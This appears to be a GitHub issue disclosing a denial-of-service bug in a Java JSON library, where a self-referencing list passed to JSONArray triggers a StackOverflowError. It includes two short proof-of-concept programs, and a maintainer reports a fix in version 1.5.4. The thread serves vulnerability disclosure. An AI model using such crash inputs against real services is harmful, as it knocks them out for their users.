If the value inside a Collection is itself, using it with JSONArray causes a StackOverflowError which may lead to DoS

Question

If the value inside a Collection is itself, using it with JSONArray causes a StackOverflowError which may lead to DoS

nitay-jfrog opened this issue 2 years ago · 1 comments

PoC when initializing a JSONArray:

public class POC {
    public static void main(String[] args) throws JSONException {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JSONArray jsonArray=new JSONArray(list);
    }
}

The result:

PoC when adding the list to an existing JSONArray:

public class POC {
    public static void main(String[] args) throws JSONException {
        ArrayList<Object> list = new ArrayList<>();
        list.add(list);
        JSONArray jsonArray=new JSONArray().put(list);
    }
}

The result:

If the issue is indeed exploitable, we can create a CVE entry after the fixed version is released since we are a CNA.

Answer 1 · 2023-03-14T12:05:03.000Z

@nitay-jfrog This is now fixed in 1.5.4, thanks.